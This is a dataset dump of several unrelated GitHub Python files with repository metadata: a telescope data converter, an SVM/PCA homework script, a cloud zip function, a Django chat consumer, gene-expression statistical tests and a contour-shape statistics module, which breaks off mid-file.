pointing[:,:,1]\n psi = pointing[:,:,2]\n pixels = hp.ang2pix(nside, theta, phi)\n #---------------------------------------------\n # Writing data to a file\n #---------------------------------------------\n # Huffmann compression\n huffman = ['huffman', {'dictNum':1}]\n # Digitization values for \\psi \n npsi = 4096\n psiBins = np.linspace(0, 2*np.pi, npsi)\n datatype = 'QUIET'\n det_list = []\n # Creating new file\n ces = level3_ces_nums[k]\n ctod.init_file(freqs[0], ces, mode='w')\n #---------------------------------------------\n # Looping through 19 amplifiers (1 ampl has 4 diodes)\n # and adding new fields to a file\n i = 0\n #for det in tqdm(range(0, 19, 1)):\n for det in range(0, 19, 1):\n label = str(det+1).zfill(2) #+ f'{diode_labels[diode]}'\n prefix = f'{ces}'.zfill(6) + '/' + label \n # Digitizing \\psi\n if(len(psi[det]) > 0):\n psiArray = np.where(psi[det] < 0, 2*np.pi + psi[det], psi[det])\n psiArray = np.where(psi[det] >= 2*np.pi, psi[det] - 2*np.pi, psi[det])\n psiIndices = np.digitize(psiArray, psiBins)\n # This field is concatination of 4 tods (i.e. 4 diodes to form amplifier)\n diodes_tods = []\n diodes_scalars = []\n diodes_names = []\n for diode in range(0, 4, 1):\n diodes_tods.append(tods[i])\n diodes_scalars.append(np.array([gain[i][0], sigma0[i], fknee[i], alpha[i]]))\n diodes_names.append(f'ref{diode}')\n i = i + 1\n diodes_tods = np.array(diodes_tods)\n diodes_scalars = np.array(diodes_scalars)\n diodes_flags = np.zeros_like(diodes_tods)\n #---------------------------------------------\n # Adding fields\n ctod.add_field(prefix + '/psi', psiIndices, huffman)#, [psiDigitize, huffman])\n ctod.add_field(prefix + '/pix', pixels[det], huffman)\n # TODs should be 4xN_tod per amplifier\n ctod.add_field(prefix + '/diodes', diodes_tods)\n # Scalars should be 4x4 per amplifier\n ctod.add_field(prefix + '/dscalars', diodes_scalars)\n # Flags for accepted/rejected vals in Commander3\n ctod.add_matrix(prefix + '/dflag', diodes_flags, diodes_names, huffman)\n #\n det_list.append(label)\n #---------------------------------------------\n # Things common for each ces scan\n prefix = 'common'\n ctod.add_field(prefix + '/det', np.string_(det_list))\n ctod.add_field(prefix + '/datatype', np.string_(datatype))\n ctod.add_field(prefix + '/npsi', npsi)\n ctod.add_field(prefix + '/nside', nside)\n polang = np.array([0, 0, 0, 0])\n nbang = np.array([0, 0, 0, 0])\n ctod.add_field(prefix + '/polang', polang)\n ctod.add_field(prefix + '/nbang', nbang)\n ctod.add_field(prefix + '/fsamp', samprate)\n #---------------------------------------------\n '''\n Thing commong for each detector\n\n [x] vsun <= velocity of the Earth wrt Sun in Galactic Coordinates, x,y,z, put np.array([0,0,0]) for now\n [x] time <= take np.array([time[0], 0, 0]) \n [x] huffsym <= for flags, pix and the psi generated huffman symbols (for decoding)\n [x] hufftree <= for flags, pix and psi generated huffman tree (encoded values)\n '''\n prefix = f'{ces}'.zfill(6) + '/common'\n vsun = np.array([0, 0, 0])\n ctod.add_field(prefix + '/vsun', vsun)\n ctod.add_field(prefix + '/time', np.array([time_vals[0], 0, 0]))\n #---------------------------------------------\n print(f\"Running finalize_chunk on file: {level3_data_files[k]}\")\n ctod.finalize_chunk(f'{ces}'.zfill(6))\n print(\"finalize_chunk has finished\")\n ctod.finalize_file()\n\n\n\nif __name__ == '__main__':\n start_time = time.time()\n print(\"Script has started!\")\n main()\n end_time = time.time()\n total_time = end_time - start_time\n print(f\"Script run time: {total_time:.2f} s\")\n\n", "repo_name": "Cosmoglobe/Commander", "sub_path": "commander3/todscripts/quiet/quiettohdf5.py", "file_name": "quiettohdf5.py", "file_ext": "py", "file_size_in_byte": 8001, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "joblib.cpu_count", "line_number": 36, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 38, "usage_type": "call"}, {"api_name": "pathlib.Path.is_dir", "line_number": 39, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 39, "usage_type": "name"}, {"api_name": "pathlib.Path.mkdir", "line_number": 40, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 40, "usage_type": "name"}, {"api_name": "numpy.string_", "line_number": 41, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 50, "usage_type": "call"}, {"api_name": "joblib.parallel_backend", "line_number": 54, "usage_type": "call"}, {"api_name": "multiprocessing.Manager", "line_number": 55, "usage_type": "call"}, {"api_name": "tod_tools.commander_tod.commander_tod", "line_number": 58, "usage_type": "call"}, {"api_name": "tod_tools.commander_tod", "line_number": 58, "usage_type": "name"}, {"api_name": "joblib.Parallel", "line_number": 60, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 60, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "healpy.ang2pix", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.digitize", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.string_", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.string_", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}, {"api_name": "time.time", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "41179194157", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport re\nfrom sklearn import svm\nfrom sklearn.metrics import accuracy_score, classification_report\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.decomposition import PCA\n\n# Read in data\nlines_data = []\nwith open('histograms.txt', 'rt') as in_file:\n for line in in_file:\n lines_data.append(line.rstrip('\\n'))\n\n# parse output +-1:[data] into x = [1,1,-1,...] y = [data]\ndata_list = []\nfor line in lines_data:\n label = int(re.split(':', line)[0])\n\n parsed_input = re.split('1:', line)[1].strip()\n parsed_input = parsed_input.replace(\"[\", \"\").replace(\"]\", \"\")\n parsed_input_list = parsed_input.split(',')\n inputs = [float(el) for el in parsed_input_list]\n row = [label] + inputs\n data_list.append(row)\ndata = np.asarray(data_list)\n\nx = data[:, 1:]\ny = data[:, 0] #labels\ny = y.reshape(5699, )\n\nsample_x = data[:, 1:]\nsample_y = y[:]\n\n# Build the SVM\nclf = svm.SVC(kernel='linear')\nclf.fit(x, y)\ny_pred = clf.predict(sample_x)\n\ncount = 0\nfor label, predicted in zip(sample_y, y_pred):\n if (label == predicted):\n continue\n print(\"%r\" % label == predicted)\n count += 1\nprint(count)\n\nscores = zip(sample_y, y_pred)\nmapped_scores = list(scores)\n\n# Model Evaluation\nprint(\"---- SVM MODEL REPORT -----\")\nprint(\"Accuracy: %f\" % accuracy_score(sample_y, y_pred))\nprint(classification_report(sample_y, y_pred))\n# Writing data to file\ninputFile = open(\"SVM_info.txt\", \"w\")\ninputFile.write(\"---- SVM MODEL REPORT ----- \\n\")\ninputFile.write(\"Accuracy: %f \\n\" % accuracy_score(sample_y, y_pred))\ninputFile.write(classification_report(sample_y, y_pred))\ninputFile.close()\n\n# PCA - part II\npca_model = PCA(n_components=100)\nvariance = pca_model.fit(data)\nprint(\"--- PCA ---\")\nprint(variance)\nprint(\"Eigenvalues: \\n\")\nprint(pca_model.explained_variance_)\nprint(\"Explained variance ratio\")\nprint(pca_model.explained_variance_ratio_)\nprint(\"Explained variance cum. sum\")\nprint(pca_model.explained_variance_ratio_.cumsum())\nprint(\"Principal components: \\n\")\nprint(pca_model.components_)\n\npca_data = pca_model.transform(data)\nprint(pca_data)\n\n# Writing data to file\ninputFile = open(\"PCA_info.txt\", \"w\")\ninputFile.write(str(pca_model.explained_variance_))\ninputFile.close()", "repo_name": "NguyenDa18/MachineLearning_HW4", "sub_path": "hw4.py", "file_name": "hw4.py", "file_ext": "py", "file_size_in_byte": 2289, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.split", "line_number": 19, "usage_type": "call"}, {"api_name": "re.split", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 37, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 55, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "72729584834", "text": "# ===========================================================================================\n# Objeto........: fnc_zip_files\n# Data Criacao..: 09/01/2023\n# Descricao.....: Zipa arquivos e efetua upload para o bucket\n# ===========================================================================================\nimport io \nimport datetime, time\nfrom zipfile import ZipFile, ZIP_DEFLATED\nimport sys\nfrom cloud_function.fnc_zip_file.utils import Blob\nimport logging\n\nimport functions_framework\n\nstart_time = time.time()\n\n@functions_framework.http\ndef main(request):\n print('main')\n print(f'{datetime.datetime.now()}')\n\n # Variaveis de Entrada\n GCS_INPUT = request.json[\"gcs_input\"]\n GCS_OUTPUT = request.json[\"gcs_output\"]\n FILENAME = request.json[\"filename\"]\n\n # Variaveis de Input\n INPUT_BUCKET_NAME = GCS_INPUT.split(\"/\")[2]\n PREFIX = GCS_INPUT.split('/',3)[3].replace('*','')\n\n # Variaveis de Output\n OUTPUT_BUCKET_NAME = GCS_OUTPUT.split(\"/\")[2]\n FILE_PATH = GCS_OUTPUT.split('/',3)[3] if GCS_OUTPUT.endswith(\"/\") else GCS_OUTPUT.split('/',3)[3] + '/'\n\n print(\"Connecting to input bucket\")\n input_bucket: Blob = Blob(INPUT_BUCKET_NAME) # Conecta bucket origem\n blob_files: list = input_bucket.lista_blobs(PREFIX) # Lista arquivos bucket\n \n # Verificando se existem arquivos no bucket passado\n if blob_files:\n \n output_bucket: Blob = Blob(OUTPUT_BUCKET_NAME,f\"{FILE_PATH}{FILENAME}.zip\") # Conecta ao blob destino\n\n archive = io.BytesIO() # Inicializando arquivo em memoria\n \n # Inicializando escrita zip \n with ZipFile(archive,\"w\",compression=ZIP_DEFLATED) as zip_file:\n \n # Abrindo arquivo dentro do zip\n with zip_file.open(f\"{FILENAME}.csv\",\"w\", force_zip64=True) as zip_archive:\n for blob_path in blob_files:\n\n blob_name= blob_path.split('/')[-1]\n blob_size = input_bucket.get_size(blob_path)\n print(f\"[INFO] - Download file {blob_name}\")\n\n # Identifica quantas vezes o arquivo deve ser divido\n split_size = 120 # Tamanho em MB\n split_number = int((blob_size/1024**2)/split_size) if (blob_size/1024**2) > split_size else 1 \n split_list = Blob.split_byte_size(size=blob_size,blob_path=blob_path,split_number=split_number)\n\n for idx, chunk_blob in enumerate(split_list):\n chunk_downloaded = input_bucket.download_by_parts(input=chunk_blob)\n print(f\"[INFO] - Download file {blob_name} parte {idx+1} de {len(split_list)}\")\n\n zip_archive.write(chunk_downloaded) # Escreve no arquivo em memoria\n\n print(f\"[INFO] - Download file {blob_name} {idx+1} of {len(split_list)}\")\n time.sleep(0.05)\n\n archive.seek(0) # Acum\n output_bucket.upload_bytes_to_bucket(file_buffer=archive,content_type=\"application/zip\")\n archive.close() # Apagando arquivo em memoria\n else:\n print('[INFO] - Arquivo(s) não encontrado(s)')\n \n print(\"[INFO] - Cloud Run concluida em {:.2f} segundos\".format(round(time.time() - start_time,2)))\n return \"[INFO] - Cloud Function concluida\"", "repo_name": "codicarlys/GoogleCloudPlatform", "sub_path": "cloud_function/fnc_zip_file/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cloud_function.fnc_zip_file.utils.Blob", "line_number": 36, "usage_type": "name"}, {"api_name": "cloud_function.fnc_zip_file.utils.Blob", "line_number": 42, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 44, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 47, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 47, "usage_type": "name"}, {"api_name": "cloud_function.fnc_zip_file.utils.Blob.split_byte_size", "line_number": 60, "usage_type": "call"}, {"api_name": "cloud_function.fnc_zip_file.utils.Blob", "line_number": 60, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "time.time", "line_number": 77, "usage_type": "call"}, {"api_name": "functions_framework.http", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "4410509455", "text": "import json\n\nfrom channels.generic.websocket import WebsocketConsumer\nfrom asgiref.sync import async_to_sync\n\nfrom .models import PrivateBlock\n\n\nclass PrivateBlockConsumer(WebsocketConsumer):\n def connect(self):\n present_user = self.scope['user'].id if self.scope['user'].id else int(self.scope['query_string'])\n other_user = self.scope['url_route']['kwargs']['userId']\n self.private_block_name = (\n f'{present_user}_{other_user}'\n if int(present_user) > int(other_user)\n else f'{other_user}_{present_user}'\n )\n self.private_block_chat_name = f'block_{self.private_block_name}'\n self.user = self.scope['user']\n\n self.accept()\n\n async_to_sync(self.channel_layer.group_add)(\n self.private_block_chat_name,\n self.channel_name\n )\n\n def disconnect(self, code):\n async_to_sync(self.channel_layer.group_discard)(\n self.private_block_chat_name,\n self.channel_name\n )\n\n def receive(self, text_data=None, bytes_data=None):\n text_data_json = json.loads(text_data)\n message = text_data_json['message']\n\n if not self.user.is_authenticated:\n return\n\n async_to_sync(self.channel_layer.group_send)(\n self.private_block_chat_name,\n {\n 'type': 'private_block_message',\n 'user_id': self.user.id,\n 'user': self.user.username,\n 'message': message\n }\n )\n PrivateBlock.objects.create(\n user=self.user,\n message=message,\n block_thread=self.private_block_chat_name\n )\n\n def private_block_message(self, event):\n self.send(text_data=json.dumps(event))\n", "repo_name": "edfolmi/candlechat", "sub_path": "chat/block_private_consumers.py", "file_name": "block_private_consumers.py", "file_ext": "py", "file_size_in_byte": 1784, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "channels.generic.websocket.WebsocketConsumer", "line_number": 9, "usage_type": "name"}, {"api_name": "asgiref.sync.async_to_sync", "line_number": 23, "usage_type": "call"}, {"api_name": "asgiref.sync.async_to_sync", "line_number": 29, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}, {"api_name": "asgiref.sync.async_to_sync", "line_number": 41, "usage_type": "call"}, {"api_name": "models.PrivateBlock.objects.create", "line_number": 50, "usage_type": "call"}, {"api_name": "models.PrivateBlock.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "models.PrivateBlock", "line_number": 50, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "1654109552", "text": "from django.urls import path, include\nfrom .views import RegistrationAPIView, LoginAPIView, UserRetrieveUpdateAPIView\n\n\nurlpatterns = [\n # 회원가입\n path('register/', RegistrationAPIView.as_view()),\n # 로그인\n path('login/', LoginAPIView.as_view()), \n # 회원정보\n path('update/', UserRetrieveUpdateAPIView.as_view())\n]", "repo_name": "kinzinzz/DRF_STUDY", "sub_path": "drf_jwt/api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 350, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.RegistrationAPIView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "views.RegistrationAPIView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.LoginAPIView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.LoginAPIView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.UserRetrieveUpdateAPIView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.UserRetrieveUpdateAPIView", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "13619791701", "text": "import statistics\nimport sys\nfrom tqdm import tqdm\nfrom scipy import stats\nimport numpy as np\n\n\ndef remove_genes_with_median_0(data_frame):\n \"\"\"\n Description: Removes the genes for which the median calculated\n on all patients (normal + tumor) is = 0\n :param data_frame: data frame containing gene expression data\n :return data_frame: data frame after removing genes with median = 0\n :return removed_genes: removed genes names\n \"\"\"\n removed_genes = []\n for gene in tqdm(data_frame.columns, desc=\">> Compute median for each gene...\", file=sys.stdout):\n median = statistics.median(data_frame[gene])\n if median == 0:\n removed_genes.append(gene)\n\n data_frame = data_frame.drop(columns=removed_genes)\n return data_frame, removed_genes\n\n\ndef mann_whitney_u_test(data_frame_0, data_frame_1, alpha):\n \"\"\"\n Description: Non-parametric statistical test\n :param data_frame_0: data frame containing gene expression values of normal patients\n :param data_frame_1: data frame containing gene expression values of tumor patients\n :param alpha:\n :return m_reduced_genes: differentially expressed genes in normal and tumor samples\n \"\"\"\n m_reduced_genes = []\n\n for gene in tqdm(data_frame_0.columns, desc=\">> Computing test for each gene...\", file=sys.stdout):\n statistic, pvalue = stats.mannwhitneyu(data_frame_0[gene].tolist(), data_frame_1[gene].tolist())\n if pvalue < alpha / len(data_frame_0.columns): # Bonferroni adjustment\n m_reduced_genes.append(gene)\n\n return m_reduced_genes\n\n\ndef welch_t_test(data_frame_0, data_frame_1, alpha):\n \"\"\"\n Description: Parametric statistical test\n :param data_frame_0: data frame containing gene expression values of normal patients\n :param data_frame_1: data frame containing gene expression values of tumor patients\n :param alpha:\n :return dict_: dictionary containing:\n - genes_b: differentially expressed genes in normal and tumor samples (with bonferroni adjustment)\n - genes: differentially expressed genes in normal and tumor samples\n - p_values_b: p values (bonferroni)\n - t_values_b: t values (bonferroni)\n - all_p_values: all p values\n - all_t_values: all t values\n \"\"\"\n\n dict_ = {\n 'genes_b': [], # genes_bonferroni\n 'genes': [],\n 'p_values_b': [], # pvalues bonferroni\n 't_values_b': [], # tvalues bonferroni\n 'all_p_values': [],\n 'all_t_values': []\n }\n\n for gene in tqdm(data_frame_0.columns, desc=\">> Computing test for each gene...\", file=sys.stdout):\n tvalue, pvalue = stats.ttest_ind(np.array(data_frame_0[gene].tolist()),\n np.array(data_frame_1[gene].tolist()),\n equal_var=False, nan_policy='omit')\n\n if not np.isnan(pvalue) and pvalue < alpha:\n dict_['genes'].append(gene)\n\n if not np.isnan(pvalue) and pvalue <= alpha / len(data_frame_0.columns):\n dict_['genes_b'].append(gene)\n dict_['p_values_b'].append(pvalue)\n dict_['t_values_b'].append(tvalue)\n\n dict_['all_p_values'].append(pvalue)\n dict_['all_t_values'].append(tvalue)\n\n return dict_\n\n\ndef is_float(value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n", "repo_name": "Sylelil/Bioinformatics_project", "sub_path": "src/genes/features_selection_method/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 3408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tqdm.tqdm", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 17, "usage_type": "attribute"}, {"api_name": "statistics.median", "line_number": 18, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 36, "usage_type": "attribute"}, {"api_name": "scipy.stats.mannwhitneyu", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 37, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 68, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 68, "usage_type": "attribute"}, {"api_name": "scipy.stats.ttest_ind", "line_number": 69, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "5854759689", "text": "\n'''\nlmfree2d:\nA collection of functions for conducting landmark-free statistical analysis\nof 2D contours shapes.\n\nModule containing functions used across scripts.\n\nThis is the only module in this repository. All other PY files are scripts.\n\nPlease cite the following paper:\n\nPataky TC, Yagi M, Ichihashi N, Cox PG (2021). Automated, landmark-free,\nparametric hypothesis tests regarding two-dimensional contour shapes using\ncoherent point drift registration and statistical parametric mapping.\nPeerJ Comp Sci 7:e542.\n\nhttps://doi.org/10.7717/peerj-cs.542\n'''\n\n__version__ = '0.1.1' #2021-08-27\n\nimport os,unipath\nfrom functools import wraps\nimport numpy as np\nimport scipy.spatial\nfrom matplotlib import pyplot as plt\nfrom geomdl import fitting\nimport networkx as nx\nimport pycpd\nfrom sklearn.neighbors import NearestNeighbors\nimport spm1d\n\n\n\n# the following RGB colors are used in various figures and plotting functions\ncolors = np.array([\n\t[177,139,187],\n\t[166,154,196],\n\t[132,118,181],\n\t[225,215,231],\n\t[252,227,205],\n\t[231,179,159],\n\t[213,160,104],\n\t[166,198,226],\n\t[134,167,202],\n ]) / 255\n\n\n\nclass _skip_template(object):\n\t'''\n\tDecorator class for skipping a template array.\n\t\n\tFor a function call \"g = f(a, b)\", where a and b are NumPy arrays,\n\tthis decorator will cause the function to skip processing and return b,\n\tif a and b are the same.\n\t'''\n\n\tdef __init__(self, f):\n\t\tself.f = f\n\n\tdef __call__(self, r, *args, **kwargs):\n\t\tif np.array_equal(r, args[0]):\n\t\t\tr1 = r.copy()\n\t\telse:\n\t\t\tr1 = self.f(r, *args, **kwargs)\n\t\treturn r1\n\n\n\nclass _process_mulitple_contours(object):\n\t'''\n\tDecorator class for skipping a template array.\n\t\n\tFor a function call \"g = f(a)\", where a is a NumPy array,\n\tthis decorator will cause the function to process all elements along\n\tthe first dimension of a, if a is not a 2D array.\n\t\n\tNotes:\n\t- If a is a 2D array, this decorator will not have any effect.\n\t- Otherwise this decorator will cause the function to iteratively\n\t process all 2D arrays: a[0], a[1], ...\n\t'''\n\n\tdef __init__(self, f):\n\t\tself.f = f\n\n\tdef __call__(self, r, *args, **kwargs):\n\t\tif r.ndim in [1,3]:\n\t\t\tr1 = np.array([self.f(rr, *args, **kwargs) for rr in r])\n\t\telse:\n\t\t\tr1 = self.f(r, *args, **kwargs)\n\t\treturn r1\n\n\n\ndef _pvalue2str(p, latex=False):\n\t'''\n\tConvert a probability value to a string.\n\t\n\t- If p is less than 0.001, \"< 0.001\" will be returned.\n\t- Otherwise p will be formatted to 3 decimal points\n\t'''\n\t\n\tif latex:\n\t\ts = r'$p < 0.001$' if (p < 0.001) else (r'$p = %.3f$' %p)\n\telse:\n\t\ts = '< 0.001' if (p<0.001) else '%.3f' %p\n\treturn s\n\n\n\nclass TwoSampleSPMResults(object):\n\t'''\n\tClass continaing statistical results for two-sample tests\n\t\n\tAttributes:\n\t\n\t* alpha : Type I error rate\n\t* m0 : mean contour for first group\n\t* m1 : mean contour for second group\n\t* p : probability of observing the given z_max value, if m0=m1, given the underlying shape variance\n\t* z : test statistic values (one for each contour point)\n\t* zc : critical test statistic value at alpha\n\t\n\tProperties:\n\t\n\t* T2_critical : (same as \"zc\")\n\t* T2_max : (same as \"z_max\")\n\t* n : number of contour points\n\t* npoints : (same as \"n\")\n\t* z_crticial: (same as \"zc\")\n\t* z_max : maximum test statistic value\n\t* zi: test statistic values, thresholded at zc\n\t\n\tMethods:\n\t\n\t* plot : plot the results including mean shapes, excursion set and p value\n\t* write_csv : write all attributes to CSV file\n\t'''\n\t\n\tdef __init__(self, m0, m1, z, alpha, zcrit, p):\n\t\tself.m0 = m0\n\t\tself.m1 = m1\n\t\tself.z = z\n\t\tself.alpha = alpha\n\t\tself.zc = zcrit\n\t\tself.p = p\n\t\n\tdef __repr__(self):\n\t\ts = 'TwoSampleSPMResults\\n'\n\t\ts += ' npoints = %d\\n' %self.n\n\t\ts += ' T2_max = %.3f\\n' %self.z_max\n\t\ts += '----- Inference -----\\n'\n\t\ts += ' alpha = %.3f\\n' %self.alpha\n\t\ts += ' T2_critical = %.3f\\n' %self.zc\n\t\ts += ' p = %s\\n' %_pvalue2str(self.p)\n\t\treturn s\n\t\n\t@property\n\tdef T2_critical(self):\n\t\treturn self.zc\n\t@property\n\tdef T2_max(self):\n\t\treturn self.z.max()\n\t@property\n\tdef n(self):\n\t\treturn self.z.size\n\t@property\n\tdef npoints(self):\n\t\treturn self.n\n\t@property\n\tdef z_critical(self):\n\t\treturn self.zc\n\t@property\n\tdef z_max(self):\n\t\treturn self.z.max()\n\t@property\n\tdef zi(self):\n\t\tzi = self.z.copy()\n\t\tzi[self.z self.zc ):\n\t\t\tax.scatter(x1, y1, s=30, c=self.zi, cmap='hot', edgecolor='k', vmin=vmin, vmax=vmax, zorder=2, label='Suprathreshold Points')\n\t\t# add p value as text:\n\t\tpxo,pyo = poffset\n\t\tax.text(x0.mean()+pxo, y0.mean()+pyo, _pvalue2str(self.p, latex=True), ha='center', size=12)\n\t\tax.axis('equal')\n\t\tax.axis('off')\n\n\tdef plot_with_all_contours(self, contoursA, contoursB, ax=None, offset=(0,0), poffset=(0,0), fc='0.65', ec='k', vmin=None, vmax=None):\n\t\t'''\n\t\tPlot statistical results.\n\t\n\t\tBelow \"m0\" and \"m1\" are the mean shapes for the first and second groups, respectively.\n\n\t\tArguments:\n\n\t\t* ax : a Matplotlib axes object (default: plt.gca() )\n\t\t* offset : position offset for mean shapes\n\t\t* poffset : position offset for p value text (relative to m0 centroid)\n\t\t* fc : face color for m0\n\t\t* ec : edge color for m1\n\t\t* vmin : minimum color value for excursion set (values below vmin will have the same color as vmin)\n\t\t* vmax : maximum color value for excursion set (values above vmax will have the same color as vmax)\n\t\t'''\n\t\tax = plt.gca() if (ax is None) else ax\n\t\tassert isinstance(ax, plt.Axes), '\"ax\" must be a Matplotlib Axes object'\n\t\tx0,y0 = (self.m0 + offset).T\n\t\tx1,y1 = (self.m1 + offset).T\n\t\tx0,y0 = (self.m0 + offset).T\n\t\tax.fill(x0, y0, color=fc, zorder=0)\n\t\t# plot contours and their mean:\n\t\tc0,c1 = '0.2', colors[5]\n\t\tfor contours,color in zip([contoursA,contoursB], [c0,c1]):\n\t\t\tcontours += offset\n\t\t\tfor r in contours:\n\t\t\t\tr = np.vstack( [ r , r[0] ] )\n\t\t\t\tax.plot(r[:,0], r[:,1], color=color, lw=0.5, zorder=0)\n\t\t\tm = contours.mean(axis=0)\n\t\t\tax.plot(m[:,0], m[:,1], color=color, lw=3, zorder=1)\n\t\t# plot suprathreshold points:\n\t\tif np.any( self.z > self.zc ):\n\t\t\tax.scatter(x1, y1, s=30, c=self.zi, cmap='hot', edgecolor='k', vmin=vmin, vmax=vmax, zorder=2, label='Suprathreshold Points')\n\t\t# add p value as text:\n\t\tpxo,pyo = poffset\n\t\tax.text(x0.mean()+pxo, y0.mean()+pyo, _pvalue2str(self.p, latex=True), ha='center', size=12)\n\t\tax.axis('equal')\n\t\tax.axis('off')\n\t\n\tdef write_csv(self, fname):\n\t\t'''\n\t\tWrite results to CSV file.\n\t\t\n\t\tArguments:\n\t\t\n\t\t* fname : file name (use a \".csv\" extension)\n\t\t'''\n\t\twith open(fname, 'w') as f:\n\t\t\tf.write('Two Sample SPM 